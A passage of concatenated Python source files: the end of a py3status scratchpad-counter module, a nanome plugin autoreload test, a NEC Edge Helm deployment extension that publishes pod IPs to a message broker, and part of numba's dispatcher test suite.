i3 = Connection()
self.update(i3)
for event in ["window::move", "window::urgent"]:
i3.on(event, self.update)
i3.main()
def update(self, i3, event=None):
leaves = i3.get_tree().scratchpad().leaves()
temporary = {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum(window.urgent for window in leaves),
}
if self.scratchpad_data != temporary:
self.scratchpad_data = temporary
self.parent.py3.update()
def get_scratchpad_data(self):
return self.scratchpad_data
class Msg(Ipc):
"""
i3-msg - send messages to i3 window manager
swaymsg - send messages to sway window manager
"""
def setup(self, parent):
from json import loads
self.json_loads = loads
wm_msg = {"i3msg": "i3-msg"}.get(parent.ipc, parent.ipc)
self.tree_command = [wm_msg, "-t", "get_tree"]
def get_scratchpad_data(self):
tree = self.json_loads(self.parent.py3.command_output(self.tree_command))
leaves = self.find_scratchpad(tree).get("floating_nodes", [])
return {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum([window["urgent"] for window in leaves]),
}
def find_scratchpad(self, tree):
if tree.get("name") == "__i3_scratch":
return tree
for x in tree.get("nodes", []):
result = self.find_scratchpad(x)
if result:
return result
return {}
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 5
format = "\u232b [\?color=scratchpad {scratchpad}]"
thresholds = [(0, "darkgray"), (1, "violet")]
def post_config_hook(self):
# ipc: specify i3ipc, i3-msg, or swaymsg, otherwise auto
self.ipc = getattr(self, "ipc", "")
if self.ipc in ["", "i3ipc"]:
try:
from i3ipc import Connection # noqa f401
self.ipc = "i3ipc"
except Exception:
if self.ipc:
raise # module not found
self.ipc = (self.ipc or self.py3.get_wm_msg()).replace("-", "")
if self.ipc in ["i3ipc"]:
self.backend = I3ipc(self)
elif self.ipc in ["i3msg", "swaymsg"]:
self.backend = Msg(self)
else:
raise Exception(STRING_ERROR.format(self.ipc))
self.thresholds_init = self.py3.get_color_names_list(self.format)
def scratchpad(self):
scratchpad_data = self.backend.get_scratchpad_data()
for x in self.thresholds_init:
if x in scratchpad_data:
self.py3.threshold_get_color(scratchpad_data[x], x)
response = {
"cached_until": self.py3.time_in(self.cache_timeout),
"full_text": self.py3.safe_format(self.format, scratchpad_data),
}
if scratchpad_data["urgent"]:
response["urgent"] = True
return response
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
config = {"format": "\[{ipc}\] [\?color=scratchpad {scratchpad}]"}
module_test(Py3status, config=config)
|
TestAutoReload.py
|
import nanome
from multiprocessing import Process
import time
import sys
def start_process():
print("Start subproc")
sys.stdout.flush()
while True:
print("Hello")
sys.stdout.flush()
time.sleep(3)
class Test(nanome.PluginInstance):
pass
process = None
def pre_run():
print("Pre run")
sys.stdout.flush()
global process
process = Process(target=start_process)
process.start()
def post_run():
print("Post run")
sys.stdout.flush()
process.kill()
if __name__ == "__main__":
plugin = nanome.Plugin("Test Autoreload", "", "Test", False)
plugin.pre_run = pre_run
plugin.post_run = post_run
plugin.set_plugin_class(Test)
plugin.run('127.0.0.1', 8888)
|
necedge.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2020 Giovanni Baggio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""NEC Edge extension."""
import os
import json
import yaml
import requests
import logging
from lightedge.managers.appmanager.helmextensions.publisher import *
from helmpythonclient.client import HelmPythonClient
broker_endpoint = "activemq-service.default.svc.cluster.local:5672"
class NECEdge(HelmPythonClient):
message_to_publish = {}
message_to_publish["apps"] = list()
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.root = dict()
self.releases = dict()
self.topic = dict()
def list(self, **kwargs):
return self._get_releases(), None
def install(self, release_name, chart_name, app_host=False, upgrade=False, **kwargs):
chart_dir = self.default_chart_dir
if 'chart_dir' in kwargs:
chart_dir = kwargs['chart_dir']
if app_host:
self.root[release_name] = app_host
if "195.37.154.70" in app_host:
self.topic[release_name] = "EC1.NetworkServiceIP"
else:
self.topic[release_name] = "EC2.NetworkServiceIP"
chart_path = '%s/%s' % (chart_dir, release_name)
command = [self.helm, "template", release_name, chart_path]
k8s_code, err = self._run_command(command)
json_docs = []
yaml_docs = yaml.load_all(k8s_code)
for doc in yaml_docs:
json_docs.append(doc)
if upgrade:
url = "%s/api/v1/update/app/%s" % (self.root[release_name], release_name)
response = requests.put(url, json=json_docs)
else:
url = "%s/api/v1/create/app/%s" % (self.root[release_name], release_name)
response = requests.post(url, json=json_docs)
logging.info("WITHIN INSTALL self.root %s" % (self.root))
logging.info("STATUS CODE FROM EC %s" % (response.status_code))
if response.status_code != 200:
raise ValueError("Error from NEC Edge API")
""" Getting Pod's IP address and publishing on the broker """
response_list = json.loads(response.text)
logging.info("RESPONSE LIST %s" % (response_list))
for ns_element in response_list:
for pod_name, pod_ip in ns_element.items():
if release_name in pod_name:
ns_ip = pod_ip
if release_name is chart_name:
for count, app in enumerate(self.message_to_publish["apps"],0):
if app["appName"] is release_name:
chart_name = self.message_to_publish["apps"][count]["helm-chart"]
self.message_to_publish["apps"].append({"appName":release_name, "helm-chart": chart_name, "ip": ns_ip})
publish_topic = self.topic[release_name]
logging.info("Publishing topic %s" % (publish_topic))
logging.info("Pubishing message %s" % (self.message_to_publish))
self.publish_ip(publish_topic, self.message_to_publish)
release = {"k8s_code": k8s_code,
"chart_dir": chart_dir,
"status": "deployed"}
self.releases[release_name] = release
return release, self.message_to_publish
def uninstall(self, release_name, **kwargs):
logging.info("WITHIN UNINSTALL self.root %s" % (self.root))
url = "%s/api/v1/delete/app/%s" % (self.root[release_name], release_name)
response = requests.delete(url)
if response.status_code != 200:
raise ValueError("Error from NEC Edge API")
for count, app in enumerate(self.message_to_publish["apps"],0):
if app["appName"] in release_name:
del self.message_to_publish["apps"][count]
logging.info("Deleting IP of %s" % (release_name))
publish_topic = self.topic[release_name]
self.publish_ip(publish_topic, self.message_to_publish)
del self.releases[release_name]
return None, None
def status(self, release_name, **kwargs):
return self._get_release(release_name), None
def get_values(self, release_name, **kwargs):
release = self.releases[release_name]
raw, _ = self.show_info(release_name, "values",
chart_dir=release["chart_dir"])
values = yaml.load(raw, yaml.SafeLoader)
return values, None
def _get_releases(self):
out_releases = []
for release_name in self.releases:
out_release = self._get_release(release_name, extended=False)
out_releases.append(out_release)
return out_releases
def _get_release(self, release_name, extended=True):
release_data = self.releases[release_name]
out_release = dict()
out_release["name"] = release_name
out_release["status"] = release_data["status"]
if extended:
out_release["k8s_code"] = release_data["k8s_code"]
return out_release
def publish_ip(self, publish_topic, publish_msg):
client = Producer(broker_endpoint, publish_topic, publish_msg)
container = Container(client)
events = EventInjector()
container.selectable(events)
qpid_thread = Thread(target=container.run)
qpid_thread.start()
logging.info("DONE PUBLISHING!!!")
|
test_dispatcher.py
|
from __future__ import print_function, division, absolute_import
import errno
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import threading
import warnings
import inspect
import pickle
import weakref
from itertools import chain
try:
import jinja2
except ImportError:
jinja2 = None
try:
import pygments
except ImportError:
pygments = None
import numpy as np
from numba import unittest_support as unittest
from numba import utils, jit, generated_jit, types, typeof, errors
from numba import _dispatcher
from numba.compiler import compile_isolated
from numba.errors import NumbaWarning
from .support import (TestCase, tag, temp_directory, import_dynamic,
override_env_config, capture_cache_log, captured_stdout)
from numba.numpy_support import as_dtype
from numba.targets import codegen
from numba.caching import _UserWideCacheLocator
from numba.dispatcher import Dispatcher
from numba import parfor
from .test_linalg import needs_lapack
from .support import skip_parfors_unsupported
import llvmlite.binding as ll
_is_armv7l = platform.machine() == 'armv7l'
def dummy(x):
return x
def add(x, y):
return x + y
def addsub(x, y, z):
return x - y + z
def addsub_defaults(x, y=2, z=3):
return x - y + z
def star_defaults(x, y=2, *z):
return x, y, z
def generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x, y):
return x + y
else:
def impl(x, y):
return x - y
return impl
def bad_generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x):
return x
else:
def impl(x, y=6):
return x - y
return impl
def dtype_generated_usecase(a, b, dtype=None):
if isinstance(dtype, (types.misc.NoneType, types.misc.Omitted)):
out_dtype = np.result_type(*(np.dtype(ary.dtype.name)
for ary in (a, b)))
elif isinstance(dtype, (types.DType, types.NumberClass)):
out_dtype = as_dtype(dtype)
else:
raise TypeError("Unhandled Type %s" % type(dtype))
def _fn(a, b, dtype=None):
return np.ones(a.shape, dtype=out_dtype)
return _fn
class BaseTest(TestCase):
jit_args = dict(nopython=True)
def compile_func(self, pyfunc):
def check(*args, **kwargs):
expected = pyfunc(*args, **kwargs)
result = f(*args, **kwargs)
self.assertPreciseEqual(result, expected)
f = jit(**self.jit_args)(pyfunc)
return f, check
def check_access_is_preventable():
# This exists to check whether it is possible to prevent access to
# a file/directory through the use of `chmod 500`. If a user has
# elevated rights (e.g. root) then writes are likely to be possible
# anyway. Tests that require functioning access prevention are
# therefore skipped based on the result of this check.
tempdir = temp_directory('test_cache')
test_dir = (os.path.join(tempdir, 'writable_test'))
os.mkdir(test_dir)
# assume access prevention is not possible
ret = False
# check a write is possible
with open(os.path.join(test_dir, 'write_ok'), 'wt') as f:
f.write('check1')
# now forbid access
os.chmod(test_dir, 0o500)
try:
with open(os.path.join(test_dir, 'write_forbidden'), 'wt') as f:
f.write('check2')
except (OSError, IOError) as e:
# Check that the cause of the exception is due to access/permission
# as per
# https://github.com/conda/conda/blob/4.5.0/conda/gateways/disk/permissions.py#L35-L37 # noqa: E501
eno = getattr(e, 'errno', None)
if eno in (errno.EACCES, errno.EPERM):
# errno reports access/perm fail so access prevention via
# `chmod 500` works for this user.
ret = True
finally:
os.chmod(test_dir, 0o775)
shutil.rmtree(test_dir)
return ret
_access_preventable = check_access_is_preventable()
_access_msg = "Cannot create a directory to which writes are preventable"
skip_bad_access = unittest.skipUnless(_access_preventable, _access_msg)
class TestDispatcher(BaseTest):
def test_dyn_pyfunc(self):
@jit
def foo(x):
return x
foo(1)
[cr] = foo.overloads.values()
# __module__ must be match that of foo
self.assertEqual(cr.entry_point.__module__, foo.py_func.__module__)
def test_no_argument(self):
@jit
def foo():
return 1
# Just make sure this doesn't crash
foo()
def test_coerce_input_types(self):
# Issue #486: do not allow unsafe conversions if we can still
# compile other specializations.
c_add = jit(nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
self.assertPreciseEqual(c_add(12.3, 45.6), add(12.3, 45.6))
self.assertPreciseEqual(c_add(12.3, 45.6j), add(12.3, 45.6j))
self.assertPreciseEqual(c_add(12300000000, 456), add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = jit('(i4, i4)', nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
# Implicit (unsafe) conversion of float to int
self.assertPreciseEqual(c_add(12.3, 45.6), add(12, 45))
with self.assertRaises(TypeError):
# Implicit conversion of complex to int disallowed
c_add(12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
@jit
def foo(a, b):
return a + b
INT = 1
FLT = 1.5
self.assertAlmostEqual(foo(INT, FLT), INT + FLT)
self.assertEqual(len(foo.overloads), 1)
self.assertAlmostEqual(foo(FLT, INT), FLT + INT)
self.assertEqual(len(foo.overloads), 2)
self.assertAlmostEqual(foo(FLT, FLT), FLT + FLT)
self.assertEqual(len(foo.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
self.assertAlmostEqual(foo(1, 1), INT + INT)
self.assertEqual(len(foo.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@jit
def foo(x):
return x + 1
def wrapper():
try:
self.assertEqual(foo(1), 2)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_explicit_signatures(self):
f = jit("(int64,int64)")(add)
# Approximate match (unsafe conversion)
self.assertPreciseEqual(f(1.5, 2.5), 3)
self.assertEqual(len(f.overloads), 1, f.overloads)
f = jit(["(int64,int64)", "(float64,float64)"])(add)
# Exact signature matches
self.assertPreciseEqual(f(1, 2), 3)
self.assertPreciseEqual(f(1.5, 2.5), 4.0)
# Approximate match (int32 -> float64 is a safe conversion)
self.assertPreciseEqual(f(np.int32(1), 2.5), 3.5)
# No conversion
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertIn("No matching definition", str(cm.exception))
self.assertEqual(len(f.overloads), 2, f.overloads)
# A more interesting one...
f = jit(["(float32,float32)", "(float64,float64)"])(add)
self.assertPreciseEqual(f(np.float32(1), np.float32(2**-25)), 1.0)
self.assertPreciseEqual(f(1, 2**-25), 1.0000000298023224)
# Fail to resolve ambiguity between the two best overloads
f = jit(["(float32,float64)",
"(float64,float32)",
"(int64,int64)"])(add)
with self.assertRaises(TypeError) as cm:
f(1.0, 2.0)
# The two best matches are output in the error message, as well
# as the actual argument types.
self.assertRegexpMatches(
str(cm.exception),
r"Ambiguous overloading for <function add [^>]*> "
r"\(float64, float64\):\n"
r"\(float32, float64\) -> float64\n"
r"\(float64, float32\) -> float64"
)
# The integer signature is not part of the best matches
self.assertNotIn("int64", str(cm.exception))
def test_signature_mismatch(self):
tmpl = ("Signature mismatch: %d argument types given, but function "
"takes 2 arguments")
with self.assertRaises(TypeError) as cm:
jit("()")(add)
self.assertIn(tmpl % 0, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,)")(add)
self.assertIn(tmpl % 1, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,intc,intc)")(add)
self.assertIn(tmpl % 3, str(cm.exception))
# With forceobj=True, an empty tuple is accepted
jit("()", forceobj=True)(add)
with self.assertRaises(TypeError) as cm:
jit("(intc,)", forceobj=True)(add)
self.assertIn(tmpl % 1, str(cm.exception))
def test_matching_error_message(self):
f = jit("(intc,intc)")(add)
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertEqual(str(cm.exception),
"No matching definition for argument type(s) "
"complex128, complex128")
def test_disabled_compilation(self):
@jit
def foo(a):
return a
foo.compile("(float32,)")
foo.disable_compile()
with self.assertRaises(RuntimeError) as raises:
foo.compile("(int32,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 1)
def test_disabled_compilation_through_list(self):
@jit(["(float32,)", "(int32,)"])
def foo(a):
return a
with self.assertRaises(RuntimeError) as raises:
foo.compile("(complex64,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 2)
def test_disabled_compilation_nested_call(self):
@jit(["(intp,)"])
def foo(a):
return a
@jit
def bar():
foo(1)
foo(np.ones(1)) # no matching definition
with self.assertRaises(TypeError) as raises:
bar()
m = "No matching definition for argument type(s) array(float64, 1d, C)"
self.assertEqual(str(raises.exception), m)
def test_fingerprint_failure(self):
"""
Failure in computing the fingerprint cannot affect a nopython=False
function. On the other hand, with nopython=True, a ValueError should
be raised to report the failure with fingerprint.
"""
@jit
def foo(x):
return x
# Empty list will trigger failure in compile_fingerprint
errmsg = 'cannot compute fingerprint of empty list'
with self.assertRaises(ValueError) as raises:
_dispatcher.compute_fingerprint([])
self.assertIn(errmsg, str(raises.exception))
# It should work in fallback
self.assertEqual(foo([]), [])
# But, not in nopython=True
strict_foo = jit(nopython=True)(foo.py_func)
with self.assertRaises(ValueError) as raises:
strict_foo([])
self.assertIn(errmsg, str(raises.exception))
# Test in loop lifting context
@jit
def bar():
object() # force looplifting
x = []
for i in range(10):
x = foo(x)
return x
self.assertEqual(bar(), [])
# Make sure it was looplifted
[cr] = bar.overloads.values()
self.assertEqual(len(cr.lifted), 1)
def test_serialization(self):
"""
Test serialization of Dispatcher objects
"""
@jit(nopython=True)
def foo(x):
return x + 1
self.assertEqual(foo(1), 2)
# get serialization memo
memo = Dispatcher._memo
Dispatcher._recent.clear()
memo_size = len(memo)
# pickle foo and check memo size
serialized_foo = pickle.dumps(foo)
# increases the memo size
self.assertEqual(memo_size + 1, len(memo))
# unpickle
foo_rebuilt = pickle.loads(serialized_foo)
self.assertEqual(memo_size + 1, len(memo))
self.assertIs(foo, foo_rebuilt)
# do we get the same object even if we delete all the explict
# references?
id_orig = id(foo_rebuilt)
del foo
del foo_rebuilt
self.assertEqual(memo_size + 1, len(memo))
new_foo = pickle.loads(serialized_foo)
self.assertEqual(id_orig, id(new_foo))
# now clear the recent cache
ref = weakref.ref(new_foo)
del new_foo
Dispatcher._recent.clear()
self.assertEqual(memo_size, len(memo))
# show that deserializing creates a new object
pickle.loads(serialized_foo)
self.assertIs(ref(), None)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_array_dispatch(self):
# for context see issue #2937
def foo(a):
return np.linalg.matrix_power(a, 1)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as Cartesian production of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# The checks must be run in this order to create the dispatch key
# sequence that causes invalid dispatch noted in #2937.
# The first two should hit the cache as they are aligned, supported
# order and under 5 dimensions. The second two should end up in the
# fallback path as they are misaligned.
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
check("F_contig_misaligned", F_contig_misaligned)
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_immutability_in_array_dispatch(self):
# RO operation in function
def foo(a):
return np.sum(a)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as Cartesian production of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a, disable_write_bit=False):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
if disable_write_bit:
a.flags.writeable = False
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# all of these should end up in the fallback path as they have no write
# bit set
check("C_contig_aligned", C_contig_aligned, disable_write_bit=True)
check("F_contig_aligned", F_contig_aligned, disable_write_bit=True)
check("C_contig_misaligned", C_contig_misaligned,
disable_write_bit=True)
check("F_contig_misaligned", F_contig_misaligned,
disable_write_bit=True)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_high_dimension_array_dispatch(self):
def foo(a):
return np.linalg.matrix_power(a[0, 0, 0, 0, :, :], 1)
jitfoo = jit(nopython=True)(foo)
def check_properties(arr, layout, aligned):
self.assertEqual(arr.flags.aligned, aligned)
if layout == "C":
self.assertEqual(arr.flags.c_contiguous, True)
if layout == "F":
self.assertEqual(arr.flags.f_contiguous, True)
n = 729
r = 3
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as Cartesian production of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_aligned, 'C', True)
C_contig_misaligned = tmp[1:].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_misaligned, 'C', False)
F_contig_aligned = C_contig_aligned.T
check_properties(F_contig_aligned, 'F', True)
F_contig_misaligned = C_contig_misaligned.T
check_properties(F_contig_misaligned, 'F', False)
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).\
reshape(r, r, r, r, r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# these should all hit the fallback path as the cache is only for up to
# 5 dimensions
check("F_contig_misaligned", F_contig_misaligned)
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
def test_dispatch_recompiles_for_scalars(self):
# for context #3612, essentially, compiling a lambda x:x for a
# numerically wide type (everything can be converted to a complex128)
# and then calling again with e.g. an int32 would lead to the int32
# being converted to a complex128 whereas it ought to compile an int32
# specialization.
def foo(x):
return x
# jit and compile on dispatch for 3 scalar types, expect 3 signatures
jitfoo = jit(nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 3)
expected_sigs = [(types.complex128,), (types.int32,), (types.bool_,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
# now jit with signatures so recompilation is forbidden
# expect 1 signature and type conversion
jitfoo = jit([(types.complex128,)], nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 1)
expected_sigs = [(types.complex128,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
class TestSignatureHandling(BaseTest):
"""
Test support for various parameter passing styles.
"""
@tag('important')
def test_named_args(self):
"""
Test passing named arguments to a dispatcher.
"""
f, check = self.compile_func(addsub)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# All calls above fall under the same specialization
self.assertEqual(len(f.overloads), 1)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected 3, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6)
self.assertIn("missing argument 'z'", str(cm.exception))
def test_default_args(self):
"""
Test omitting arguments with a default value.
"""
f, check = self.compile_func(addsub_defaults)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# Now omitting some values
check(3, z=10)
check(3, 4)
check(x=3, y=4)
check(3)
check(x=3)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected at least 1, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(y=6, z=7)
self.assertIn("missing argument 'x'", str(cm.exception))
def test_star_args(self):
"""
Test a compiled function with starargs in the signature.
"""
f, check = self.compile_func(star_defaults)
check(4)
check(4, 5)
check(4, 5, 6)
check(4, 5, 6, 7)
check(4, 5, 6, 7, 8)
check(x=4)
check(x=4, y=5)
check(4, y=5)
with self.assertRaises(TypeError) as cm:
f(4, 5, y=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, 5, z=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, x=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
class TestSignatureHandlingObjectMode(TestSignatureHandling):
"""
Sams as TestSignatureHandling, but in object mode.
"""
jit_args = dict(forceobj=True)
class TestGeneratedDispatcher(TestCase):
"""
Tests for @generated_jit.
"""
@tag('important')
def test_generated(self):
f = generated_jit(nopython=True)(generated_usecase)
self.assertEqual(f(8), 8 - 5)
self.assertEqual(f(x=8), 8 - 5)
self.assertEqual(f(x=8, y=4), 8 - 4)
self.assertEqual(f(1j), 5 + 1j)
self.assertEqual(f(1j, 42), 42 + 1j)
self.assertEqual(f(x=1j, y=7), 7 + 1j)
@tag('important')
def test_generated_dtype(self):
f = generated_jit(nopython=True)(dtype_generated_usecase)
a = np.ones((10,), dtype=np.float32)
b = np.ones((10,), dtype=np.float64)
self.assertEqual(f(a, b).dtype, np.float64)
self.assertEqual(f(a, b, dtype=np.dtype('int32')).dtype, np.int32)
self.assertEqual(f(a, b, dtype=np.int32).dtype, np.int32)
def test_signature_errors(self):
"""
Check error reporting when implementation signature doesn't match
generating function signature.
"""
f = generated_jit(nopython=True)(bad_generated_usecase)
# Mismatching # of arguments
with self.assertRaises(TypeError) as raises:
f(1j)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x)'",
str(raises.exception))
# Mismatching defaults
with self.assertRaises(TypeError) as raises:
f(1)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x, y=6)'",
str(raises.exception))
class TestDispatcherMethods(TestCase):
def test_recompile(self):
closure = 1
@jit
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2.5)
self.assertEqual(len(foo.signatures), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
# Everything was recompiled
self.assertEqual(len(foo.signatures), 2)
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3.5)
def test_recompile_signatures(self):
# Same as above, but with an explicit signature on @jit.
closure = 1
@jit("int32(int32)")
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3)
@tag('important')
def test_inspect_llvm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
llvms = foo.inspect_llvm()
self.assertEqual(len(llvms), 3)
# make sure the function name shows up in the llvm
for llvm_bc in llvms.values():
# Look for the function name
self.assertIn("foo", llvm_bc)
# Look for the argument names
self.assertIn("explicit_arg1", llvm_bc)
self.assertIn("explicit_arg2", llvm_bc)
def test_inspect_asm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
asms = foo.inspect_asm()
self.assertEqual(len(asms), 3)
# make sure the function name shows up in the llvm
for asm in asms.values():
# Look for the function name
self.assertTrue("foo" in asm)
def _check_cfg_display(self, cfg, wrapper=''):
# simple stringify test
if wrapper:
wrapper = "{}{}".format(len(wrapper), wrapper)
module_name = __name__.split('.', 1)[0]
module_len = len(module_name)
prefix = r'^digraph "CFG for \'_ZN{}{}{}'.format(wrapper,
module_len,
module_name)
self.assertRegexpMatches(str(cfg), prefix)
# .display() requires an optional dependency on `graphviz`.
# just test for the attribute without running it.
self.assertTrue(callable(cfg.display))
def test_inspect_cfg(self):
# Exercise the .inspect_cfg(). These are minimal tests and do not fully
# check the correctness of the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg() without arguments
cfgs = foo.inspect_cfg()
# Correct count of overloads
self.assertEqual(len(cfgs), 3)
# Makes sure all the signatures are correct
[s1, s2, s3] = cfgs.keys()
self.assertEqual(set([s1, s2, s3]),
set(map(lambda x: (typeof(x),), [a1, a2, a3])))
for cfg in cfgs.values():
self._check_cfg_display(cfg)
self.assertEqual(len(list(cfgs.values())), 3)
# Call inspect_cfg(signature)
cfg = foo.inspect_cfg(signature=foo.signatures[0])
self._check_cfg_display(cfg)
def test_inspect_cfg_with_python_wrapper(self):
# Exercise the .inspect_cfg() including the python wrapper.
# These are minimal tests and do not fully check the correctness of
# the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg(signature, show_wrapper="python")
cfg = foo.inspect_cfg(signature=foo.signatures[0],
show_wrapper="python")
self._check_cfg_display(cfg, wrapper='cpython')
def test_inspect_types(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method
foo.inspect_types(utils.StringIO())
# Test output
expected = str(foo.overloads[foo.signatures[0]].type_annotation)
with captured_stdout() as out:
foo.inspect_types()
assert expected in out.getvalue()
def test_inspect_types_with_signature(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.0)
# Inspect all signatures
with captured_stdout() as total:
foo.inspect_types()
# Inspect first signature
with captured_stdout() as first:
foo.inspect_types(signature=foo.signatures[0])
# Inspect second signature
with captured_stdout() as second:
foo.inspect_types(signature=foo.signatures[1])
self.assertEqual(total.getvalue(), first.getvalue() + second.getvalue())
@unittest.skipIf(jinja2 is None, "please install the 'jinja2' package")
@unittest.skipIf(pygments is None, "please install the 'pygments' package")
def test_inspect_types_pretty(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method, dump the output
with captured_stdout():
ann = foo.inspect_types(pretty=True)
# ensure HTML <span> is found in the annotation output
for k, v in ann.ann.items():
span_found = False
for line in v['pygments_lines']:
